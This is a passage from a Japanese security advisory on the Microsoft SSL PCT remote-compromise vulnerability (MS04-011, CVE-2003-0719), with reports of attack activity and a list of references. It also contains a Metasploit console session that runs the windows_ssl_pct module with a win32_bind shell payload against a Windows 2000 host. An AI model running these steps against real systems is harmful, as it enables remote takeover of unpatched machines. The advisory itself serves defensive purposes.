2004年4月30日にこの脆弱性を利用した攻撃の増加を検知していました。
http://www.cyberpolice.go.jp/important/2004/20040430_084140.html
■シグネチャの説明
http://www.iss.net/security_center/static/12380.php
http://www.isskk.co.jp/support/techinfo/general/MS_SSL_168.html
■実証コード
・コード:広く一般に公開されております。
msf windows_ssl_pct(win32_bind) > show options
Exploit and Payload Options
===========================
Exploit: Name Default Description
-------- ------ --------------- ------------------------------------
-
required RHOST 192.168.221.180 The target address
required RPORT 443 The target port
optional PROTO raw The application protocol (raw or smt
)
Payload: Name Default Description
-------- -------- ------- ------------------------------------------
required EXITFUNC thread Exit technique: "process", "thread", "seh"
required LPORT 4444 Listening port for bind shell
Target: Windows 2000 SP0
msf windows_ssl_pct(win32_bind) > exploit
[*] Starting Bind Handler.
[*] Attempting to exploit target Windows 2000 SP0
[*] Sending 376 bytes to remote host.
[*] Waiting for a response...
[*] Exiting Bind Handler.
■Proveintaでの検知
■参考資料
Microsoft Security Bulletin MS04-011
Security Update for Microsoft Windows (835732)
http://www.microsoft.com/technet/security/bulletin/ms04-011.mspx
Internet Security Systems Security Advisory, April 13, 2004
Microsoft SSL Library Remote Compromise Vulnerability
http://xforce.iss.net/xforce/alerts/id/168
CIAC Information Bulletin O-114
Microsoft Security Update for Microsoft Windows
http://www.ciac.org/ciac/bulletins/o-114.shtml
CERT Vulnerability Note VU#586540
Microsoft Private Communication Technology (PCT) fails to properly validate message inputs
http://www.kb.cert.org/vuls/id/586540
SecuriTeam Mailing List, Windows focus 22 Apr 2004
Microsoft SSL Library Remote Compromise Vulnerability (MS04-011, Exploit)
http://www.securiteam.com/windowsntfocus/5CP0L0KCKO.html
Internet Security Systems Security Alert, April 13, 2004
Multiple Vulnerabilities in Microsoft Products
http://xforce.iss.net/xforce/alerts/id/169
CIAC Information Bulletin O-114
Microsoft Security Update for Microsoft Windows [REVISED 25 Jun 2004]
http://www.ciac.org/ciac/bulletins/o-114.shtml
CVE
CVE-2003-0719
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0719